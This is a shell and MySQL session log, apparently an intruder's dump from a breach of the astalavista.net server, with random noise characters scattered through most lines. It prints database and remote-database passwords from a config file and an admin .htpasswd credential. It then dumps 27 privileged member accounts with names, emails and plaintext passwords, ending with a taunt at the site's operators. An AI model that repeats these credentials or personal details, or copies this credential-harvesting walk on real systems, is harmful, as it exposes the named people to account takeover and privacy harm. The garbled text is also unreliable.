1 J: j7 f, P5 ^: q2 r% h7 M: V1 H( p8 V2 _  ]9 k
[-] Tricky task: Find home dir of astalavista.net- H/ N% W0 s: x

- n9 G, b+ a% _6 E# z1 E3 Rsh-3.2$ ls -la ~astanet3 O" R& J$ S$ M3 @
total 48
. k/ l+ R: Q) I/ E5 {8 @" C* _6 J* }drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
; O9 G9 f# }& D8 Wdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
  }  D: w9 \4 _" g. q; ]( Vdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth( l) @* n2 b: `' _) y
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history! r1 b9 f6 \9 j5 I
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
: ~7 s; h# W7 n-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
7 a3 B/ ~6 W' E! [' [5 @% t- w-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
3 d/ P* @( S7 T7 L3 mdrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
) q" }1 E! b* N7 [' ]* M- N: {4 W7 kdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap2 ?- y3 w0 j" u
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail# M2 ^0 s6 L# k$ [
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 P5 u. D. b1 H9 Y- Q1 Q-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
$ B: e7 B" k  Q$ W. `
* |0 ?7 ?4 H  {sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/# _' h; }% D: j2 n0 F
sh-3.2$ ls -la
6 {) z' e, n% R, _6 ytotal 2004 F3 W! }6 Y9 ], \2 c
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .$ ?1 |& J( e( i* k0 ?: f
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..8 e0 {  P$ g) S& C& x% \
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007( t2 u3 t" \* _) m/ m1 g
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
) R) W6 Q8 ?% T7 O: p5 Xdrwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
+ h+ \/ O& W/ f/ Kdrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend+ |. v* P- s* \& H+ u- J, x
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
" E3 C' \$ y  t5 \9 M, S/ i-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg/ p! H4 \8 U4 N
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config0 O3 Q6 `1 H9 a' T& S! Y/ `4 c$ n4 r
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron9 G7 ^. P% X1 Q" K* p
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd  q! u: H& z; {' y# K
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php( f1 _4 Z( l: U7 x8 j) W
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico0 \/ h' c! w7 j4 o- z1 R
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed: m7 m* A: u+ f& e
drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
2 l+ g5 f& j. X, X-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess* E. D2 z0 |' K% ~. Y; A
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess8 M' j) a' }0 ^4 I$ h0 Q
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
8 C  u1 r5 c: m-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html1 Z, L& q! c( k6 J- d+ D
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
3 c$ Q' N* n& U# |-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php7 h, w/ k0 |  G7 X
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
9 Y6 F- t0 n0 b- l1 @6 p- n) ydrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc! B. {) P' F5 w8 e2 D6 P. o( Q; E5 ?
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang! @' Z5 g4 b. v! v/ ], W9 ?, @& j
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib$ a& W9 ?1 c/ t% H! b
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
8 A! C$ A' Q3 s+ Idrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member& t, Q" c, C# f+ q, N4 R
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata+ M/ K: S* B0 e
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
4 S' S6 M9 O/ R. H1 p+ T-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf
$ e( T# x: `5 m* S4 o% `+ zdrwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re6 s- n3 J5 x) `- q9 s3 Q
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt( }6 z# y7 c: l. M
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
7 g3 A5 f# v. }+ \drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources3 T4 k1 I9 e# O$ s3 ~' H. A7 u
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com) N( F8 g- b' d( g; g% M! D- H
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes+ T% k" D1 H" Z! J1 {
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
/ s4 H" S/ H+ Q/ ddrwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
& K6 |& V, |# e  D( X% X+ o9 udrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
! S, `: h, s  Adrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old" A5 [, l6 J6 f6 \& ]% B4 I
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
# n$ m, q% j& @7 U1 u% x2 k' Cdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
% m/ |; i- `3 E% r1 L
9 h$ d6 ~2 R* `( h& G, ksh-3.2$ head -20 index.php& f: x' v4 t1 q- P0 L
<?PHP% @* i9 L' K( V$ L9 a) V8 N/ A
/**! |. Q4 S1 b! V
* Mainfile (external) for astalavistaNET v2.0
. n( t% L5 t+ [$ w. t*1 b. z" g% @$ d' b% w
* @copyright     Astalavista IT Engineering GmbH
) [( Z% E+ g! E" l- V3 |* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>; \5 o) d7 f- @3 [
* @version       1.0
. L* F3 I, c( h$ A# U9 h*/+ l4 F7 Z, c1 }

& R" l& {! \9 n  q        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {3 F- @2 _7 N# S) I% R- [
                $dontStartSession = false;
/ M' L$ s! i7 f( M- Q        } else {  C% p7 Q/ ~+ U. Q3 Y3 t1 y
                $dontStartSession = true;
% D  P" K& a7 ]. @/ i: d        }& O8 Z0 r! e; U0 U! J, O
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);# `1 I1 ~, b  x/ R
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
+ a+ M% E8 L- z$ W% n3 `        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);; D1 k6 n" H1 O- [8 m
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);0 k- y5 n% z+ e3 E
; ?$ M( [. \8 s- F: ?
sh-3.2$ cd config, ]# |5 C- F5 K* `5 V
sh-3.2$ ls -la
3 U, {; Q& Z! }, C1 F% Gtotal 32" C5 q! [4 d; n* @5 }: l
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .2 R0 C! q2 E5 m0 s+ E6 I9 ]
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
2 B4 c/ X+ T4 x" B-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
" E4 `/ f6 S) N2 S-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php2 H+ h/ {& p% }$ d# T9 t/ c
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php: c/ \2 S# ?% H
-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php" A2 n3 L3 z) Q3 M
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
& ^. d5 D- g1 K# Q( C; c0 H$ h5 A7 b6 Y* \  h, J
sh-3.2$ cat com.conf.php) D! o/ C- C' N! \' E+ t9 C, c
[snip]4 Z$ X9 b" u7 p' W, r$ L' s5 j' C
//member-database& Z0 h, Y$ b+ H7 V% ^/ n9 }9 [
$_CONFIG['db_mem_server']       = ‘localhost’;: L' K% M5 j+ v' h+ Y, s6 D/ K" I
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
5 M; `6 g2 \* }, [$_CONFIG['db_mem_user']         = ‘astanet_db’;+ r- _5 |2 I5 P( h( q
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;/ S5 J. R$ x9 k% D( B4 Z" z
$_CONFIG['db_mem_debug']        = false; //true or false5 j  n" w1 |0 [$ n! O
//ads-database% R& Q8 E7 g3 s5 [7 W/ u
$_CONFIG['db_ads_server']       = ‘localhost’;
% R* Q8 a. K: Z' t/ n: Y/ A7 v! Y$_CONFIG['db_ads_database'] = ‘astanet_ads’;
0 n, c9 R, o' B- k# _& n$_CONFIG['db_ads_user']         = ‘astanet_db’;
$ M8 U1 @  ?3 Q/ X# }$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;( u+ i6 n  H! k. t1 L
$_CONFIG['db_ads_debug']        = false; //true or false
" q. i; o6 H# w% m6 |: M* z//rainbow-database( w/ G2 q; |* Z0 i2 r
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;$ U) @  I: ~- S
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
: o0 Y( h/ r/ W1 P' j% B  T$_CONFIG['db_rainbow_user']     = ‘dinu’;" Z9 l% ], T* M: {! G
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
) b, V; ^& t; g0 p$_CONFIG['db_rainbow_debug']    = false; //true or false
+ p  Q; d: P8 ?; M2 b7 g9 |& J# I//mailing lists database0 X6 I: V7 i7 F
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;7 P% j# a7 R$ {0 v! C  ?1 M0 j2 s
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;$ W( C& u: |6 h5 A
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
3 ^4 `7 r$ R5 `& ~) e" p4 g4 q% {$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
; m+ g; \% ~# m& E! x+ _- d$_CONFIG['db_mailing_lists_debug']              = false; //true or false/ V' g# |' a$ h5 Y
//paypal- D; r  h" x7 c- G; z% _
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
' z& d: o% v( H4 C! P2 g6 \8 i$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
  G3 ]% ^) q' v, b$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;4 R1 c! {2 Q: {8 Q1 n- z
$_CONFIG['sub_pp_noship']       = ‘1′;4 }: ]& y. C5 s$ R2 {7 P" Y
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;- d5 b* \' l1 p7 T5 n4 C6 e
[snip]
- ~3 {: Y$ D, k0 Y; X1 d" u# q4 t$ o+ o' K. q0 K& |
sh-3.2$ cd ..  E  M) R3 ?* C* j& t
sh-3.2$ cd member
+ S! j% n! B+ Q7 m" I9 [sh-3.2$ ls -la7 n" U( e- B4 b' u/ @
total 20
5 o1 G. {: T" Y; Mdrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .$ E4 j5 e* X+ w8 V
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
' X* q  f9 H. x& H; S! @-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess+ h+ Z; Q' H1 |
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
0 L* O6 Q- P. N+ Jsh-3.2$ cat .htaccess
8 Y! k' R; b4 PSecFilterEngine off
! V4 G7 l5 z* @* R' Z( ]+ e  M! A" l2 Q0 R4 h& h
sh-3.2$ cd ..' h, o3 n6 J7 z+ `
sh-3.2$ cd cron
8 A4 I# ]- U9 h( P3 Zsh-3.2$ ls -la
/ l: y  b' X% Wtotal 168+ g, K7 M* C# n: u! n' p( {  [
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
  R6 d. W0 P0 g+ B: L% V; M2 mdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
0 e8 r2 D6 Q6 ^# v5 U- M, J-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php7 O* n* j) a9 P, ]
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
( S9 L/ h, T7 x-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
: G% O2 R' S1 n8 ^( k) W, V-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php" Q$ L6 `0 E* Q4 u9 [
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php# Q6 h$ O: N3 q! `* N
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php/ k' C% n% F" [) O- r
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php* T) K- c% Y# ~" U$ e+ A; G5 U3 ?' x
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php4 ?& J( @$ j  X' l7 m- k$ a5 F+ L
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
3 F5 J( j& a2 h/ `$ k4 E-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php4 h) d- H0 Y+ u6 X; o  H
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php" \0 G+ M" C) x4 y2 N: j, E( G
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php& [. U& l6 ]: L1 L
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
. h% v( Y% f: D5 M, }( D. I-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php7 G  ^* A" V, l" c) c) t
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
% x4 Q$ B6 U: A-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php; F* D( B! @4 g$ `& y: B# c4 V
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php. E2 y" J; k# v! E$ z( {
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php6 Z* o4 `% |5 f, ?
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
3 g8 p1 N  w- M4 f1 x- z-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
, ^* N0 J2 D$ u: Y  G, ^8 _/ Z-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
# R6 {5 N, z* X( t( l" z( l9 f3 J& Z) m2 Z8 E
sh-3.2$ cd ..- z  t" |7 a: c! ?1 K
sh-3.2$ cd _007
  l2 C# D' P3 y5 U+ ?( V3 Ksh-3.2$ ls -la$ h" y) N- ]0 K  U+ d
total 244 E- n- ]+ p1 r1 H+ P( ^
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .4 [2 j7 m3 s. F
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..: `& b5 f7 y) c% ~1 z
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess# {) m/ O: S" _& |8 r/ C
-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php0 M1 D' S/ S! d! _: V, f
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
/ u& M/ [+ X9 s2 odrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
1 A: @; D+ t  U) G: b- X; }. L) O0 M7 B0 k' `. Z' J3 n  V
sh-3.2$ cat  .htaccess. c! g, B9 Y$ d
authType Basic
) `( s1 R- |  _2 L# c$ H9 r6 eauthName Admin
- Z+ c1 a& V6 l3 v* U  zauthUserFile /home/astanet/auth/.htadm_pwd
3 T" Q# u+ D8 U; A0 y: erequire valid-user5 ^8 H$ t7 M6 Y2 ?" o0 n# y7 S1 S: K

* C" P  y/ i% }1 F5 }! I/ I& bsh-3.2$ cat /home/astanet/auth/.htadm_pwd0 [9 F+ X0 w4 m6 e4 h: D
admin2net:CR0bl65MwhfT% c5 Z1 R6 [$ l- c, L  s
4 Y1 a; U9 A' L4 `7 h
sh-3.2$ mysql -u astanet_db -p0 K; L/ Q  }9 D
Enter password:
- \; [& Z6 n2 C' I4 hWelcome to the MySQL monitor.  Commands end with ; or \g.% ~/ }0 i, H7 v' f3 @$ M
Your MySQL connection id is 275153
/ u4 @  a5 Q2 s- GServer version: 5.0.45-community-log MySQL Community Edition (GPL): X- K; J: t  d0 y: {" ^- M

- o8 V+ z& x' A7 f% m/ f1 E3 gType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 N: ]1 _' [; w+ |5 N& e. M5 O% q2 \1 N( Q8 k9 x, u5 s
mysql> show databases;& e! Y( g1 a4 o1 y+ O1 Y
+———————–+: J9 E' N/ O% t! J9 {& {! |: e
| Database              |+ n( R+ ~, a% X$ ~/ n: L/ Q
+———————–+3 K- m* G* U/ P) U6 ~8 j
| information_schema    |: I. s5 ?7 w8 F# N0 m8 }% o' T' I" r
| astanet_ads           |, Q9 ^2 L( W1 o( j
| astanet_mailing_lists |1 D9 I7 u1 g) l, Y/ `. A3 H+ o5 u
| astanet_mediawiki     |
3 k0 w) L  A& N7 K3 f  ^7 ^| astanet_membersystem  |
9 W! b6 j3 V5 t1 Z! H$ @| test                  |
. \' {4 H1 z6 Y5 D* S/ S# O+———————–+
7 H# i7 M0 e, O* C6 rows in set (0.00 sec). J' a' b7 |0 a# N& g/ }& r* R

+ U. V" Z: r. Qmysql> use astanet_membersystem
8 ?+ {$ m$ }, m0 ?% T% `; DDatabase changed
3 p6 I* {( t- P5 ^; Jmysql> show tables;& t2 c& c! @! s% T& g
+———————————–+% M9 `! [2 }1 R5 [' t( g' U0 W/ h
| Tables_in_astanet_membersystem    |
7 Y! E; l. g3 j. D4 p+———————————–+' f( D( b* t" |+ Z6 X4 T6 d
| blacklist_categories              |
* \- N, }) [( S" q, [| blacklist_content                 |2 d, ?, h: x' p8 T- y
| blacklist_levels                  |2 q2 n/ q3 i0 X9 V4 g; S
| blacklist_mcset                   |
. Y: S: s" Q' l4 j; M% V( Y% B| dir_categories                    |
: C: g- p# h) R5 J% B# U' B| dir_comments                      |7 w; N( K6 y6 m! [
| dir_links                         |
( G, b1 Y$ H* C$ O6 C; H- \2 p| dir_temp                          |. \1 L# p4 Y' q( b0 Z3 o9 k: {  ^
| dir_votes                         |/ n) V5 a; r' N- P- l* U: q
| documents                         |
; ?. {; H6 x# |  ~0 Z/ J| documents_categories              |2 \9 ^4 a' o8 w5 ?/ h5 @
| email_content                     |* Z4 K3 |9 P$ S% b- X# h5 p7 z
| email_settings                    |2 d3 L( T3 Q) _2 B
| exploits                          |2 @: Y5 q9 b2 _0 Y
| exploits_categories               |  p6 D  \& l# `( X) f! M2 i2 T7 |
| exploittree_categories            |
2 g* U+ Q, m& ]  Q! G1 D! \| exploittree_exploits              |
6 ^9 Z6 x2 v2 M4 Z| home_values                       |
6 }7 C! i, F; H* e6 F, @) O) t; B| iso_countries                     |
1 z6 l  _6 X$ D" j  T6 G| links_categories                  |
" t4 |. }6 q: U3 S/ O) Z9 ?6 k| links_records                     |( V- |' \& V% P: S3 }& ]
| links_unauth                      |' W' x1 `# `/ c+ d& [: ~8 W
| links_votes                       |
8 S( J+ b: v  X( |6 P| log                               |; i" K) }6 z8 O6 m
| news_categories                   |
* w) Z0 R8 t8 R| news_comments                     |, J$ O: a1 P" V0 L+ m5 Y
| news_emoticons                    |
' g2 F4 J7 e# P) U) [" R- S6 n$ S| news_latest                       |8 {" }8 d& \5 e* P" y4 H
| news_messages                     |; N1 J- _; }7 m
| news_statistics                   |
/ F+ }; G7 I7 C4 f! q| news_votes                        |" u$ c! I" \2 {1 u& Z9 D
| prices_content                    |; P8 |4 B4 n' k$ I
| prices_offers                     |. i1 W, Y8 @+ j$ ~
| rss_settings                      |
9 Q- ^" F+ O- f* k% P5 g| sessions                          |
; Y5 j5 |6 W3 e; ^| stats_signups                     |
  p- L" ?" D3 O2 g. a& F| u2u2                              |( N  i. s" k$ x
| u2u_contact                       |/ X, n3 R* z, n
| u2u_settings                      |
2 I: }" `" ~1 M$ [& }$ m: f1 _% H| user_keywords_selected_categories |  R' o' C' M: K6 v9 Y) y7 P5 f9 A
| users                             |; P" O* {* Q% |  P
| users_ipn_test                    |
+ D  R  X) m+ j| users_keyword_values              |
1 ~0 D7 @' `; e3 [/ A* K| users_profile                     |; y% ~3 }- J8 w! v; d
| users_temp                        |
  s7 i4 o8 n) j| users_upgrade                     |  b. \2 X) e$ j1 T
+———————————–+
: ]5 @4 v$ G, Q; E, ^46 rows in set (0.00 sec)& q; W1 s/ D$ t) S  D; M- o
; ^, A( \' c9 e) h6 e2 r
mysql> describe users;, z" ]1 U* x; I1 S' c
+————————–+————————————–+——+—–+———————+—————-+6 F/ J+ T8 M5 X( y6 U1 Y" X
| Field                    | Type                                 | Null | Key | Default             | Extra          |
/ V% G. t9 M3 G( b+————————–+————————————–+——+—–+———————+—————-+
( J3 q. u4 Y- L$ R| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
# g0 Y) ]' a/ L9 P| user                     | varchar(50)                          | NO   |     |                     |                |+ A) r% d6 A) y" C7 V& h  v: i
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
8 j( p2 n. X- C) K. y+ k| password                 | varchar(30)                          | NO   |     |                     |                |
0 p. J! e0 ?: ~; \# {4 P& ~* f: }| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
- ]9 C: H0 ], C" D- w| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
0 h% o1 X% l+ ?2 ?6 k. U% I1 z| email                    | varchar(50)                          | NO   |     |                     |                |4 J" A* C) D9 q& t9 k5 {
| ip                       | varchar(15)                          | NO   |     | 0                   |                |
' o4 W. r8 F9 r' ?) s) u| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
; ~6 z6 x% G4 i| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |0 w8 T5 q$ g7 s. K2 L" w
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |% i5 m0 S6 |0 T/ Y$ {
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |( m8 R1 ~6 [7 |* b! d
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |" l5 \8 k1 u' t6 L7 N
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |6 I" k8 I: x- e* k7 G  F" n4 H: v
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |7 S( R" w0 L; B( |& F* n: H
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |8 g1 v1 D' k, X
| lang                     | tinytext                             | NO   |     |                     |                |
' b2 t5 n) z/ o" o( c  || adid                     | smallint(6)                          | NO   |     | 0                   |                |$ G9 b$ ]  [9 t9 D2 E. M
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |* I+ }. k' U+ e' Z2 n2 n
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
) j: H/ x/ [9 W! x) Q( @| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |+ W1 ^2 @! ?' m/ U7 H7 |) q
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
: c( @$ g. W5 K, |" ^% c+————————–+————————————–+——+—–+———————+—————-+7 i0 x$ f/ C, D% ?, Z
22 rows in set (0.01 sec)
/ E, k. B9 V0 k6 l9 N6 [5 }3 Y  P3 ^% D. [% M
mysql> select count(*) as skids from users;. a& a7 H2 X' R% p- Z
+——-+
* ^2 ]' P  @. X$ T5 x2 V% J| skids |
7 R+ m7 Y. N2 h* }+——-+: ~9 w3 J3 M+ s6 o  \; q4 N  a
| 25199 |9 t" R8 h, N2 }2 Y6 @' c
+——-+  J% P; G5 j1 b# j
1 row in set (0.00 sec)
/ v1 v  V  {$ L4 e) A
& D/ o( U# `- C- w3 [; y/ |  x# x; xmysql> select user,nickname,password,email from users where userlevel = 1;+ ?) n5 i* H3 A6 d+ {9 P* F
+————————–+———————-+——————+———————————–+
7 f5 h4 b* V2 q/ u! i| user                     | nickname             | password         | email                             |3 h; v: |3 K" [8 [' x4 u( j
+————————–+———————-+——————+———————————–+
0 T$ C; J/ V% Y8 e) e| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
* y) ^- ?/ c, s% s; ^# r+ d' w| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
: a% y, ~1 j' R, M| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
" ^  x+ U9 g5 v+ G9 Y$ k6 }: [| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
- @6 d5 O% r% {! c! g8 d| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |. k$ W1 I; R  N
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
( T& x  ^6 h* {9 e% b: e4 A| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |% n* ], I8 a. L) k/ s) {
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |8 M" R+ [) u$ ?5 k: g
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |
6 q5 t) B8 ]- r4 j| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
7 s2 M; n$ u  g# n$ r1 {7 f6 F| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |
: Q' q- r  ~6 ?- {: y; P: \| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |% b* O) m% n$ r7 }- J) k
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
0 M; S) @: @6 {; z" j, ]| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
# h' p0 k. D- U! w* x| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
- ]" J9 O+ _2 ^# O* U5 F| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
- R  I$ C: w; t/ n9 J& h| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
5 V8 K4 w4 i% q# F* y| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |! c9 D: a# x9 g2 M% K+ z7 ?* I
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |' P3 o5 i. a( E; }4 [
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |
  ]) X' D, e% e6 W$ x  a/ q| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
' N1 D! K6 {; d# V, W| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
/ @) i/ ]" ~& M8 V% ^0 G| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |8 f) n) `. ], y; g* T0 }  L, W* i
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
$ d4 p# K- w5 Z| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |
$ D- N9 c- K) N8 W1 q8 || sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
1 }9 A4 ?: R) z6 f" q& e+ K  s+ g* K| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
( B; c9 X1 t3 E6 x) V% g+————————–+———————-+——————+———————————–+; W( S9 Y. C9 W; g
27 rows in set (0.00 sec)6 ?# ~% d2 e$ y. A# d! y

9 s3 V$ p  t* e- [. `mysql> exit;
# N' P5 f3 i" ^+ `# B# K0 ?Bye
1 b8 \: M# ]% v& G- o& k
2 c: I9 N- i8 y1 @: W% Z[~] plaintext passwords? yes,
# ]; a) ?0 x; a- m& |Those so called “security professionals” who charge you $6.66 / month to$ B4 i( Q- S) h3 X9 Y3 h( X9 b
register at their hack-proof portal, save your passwords in plaintext…, U3 o( g0 S! \3 d7 b/ _
